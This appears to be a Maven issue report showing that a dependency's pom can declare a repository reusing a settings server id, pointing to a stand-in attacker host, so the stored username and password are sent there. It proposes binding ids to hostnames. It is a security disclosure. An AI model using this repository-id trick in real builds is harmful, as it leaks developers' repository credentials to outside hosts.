Details
Description
Related discussion: http://markmail.org/message/7pswshucxc7qwtef
in your settings you have:
<server>
<username>olamy</username>
<password>reallycomplicatedpassword</password>
<id>foo.org</id>
</server>
During dependencies resolution, you get a pom with a repository.
<repository>
<id>foo.org</id>
<url>http://yourpasswordwillbehacked.org/</url>
</repository>
Idea id in settings must contains the target hostname.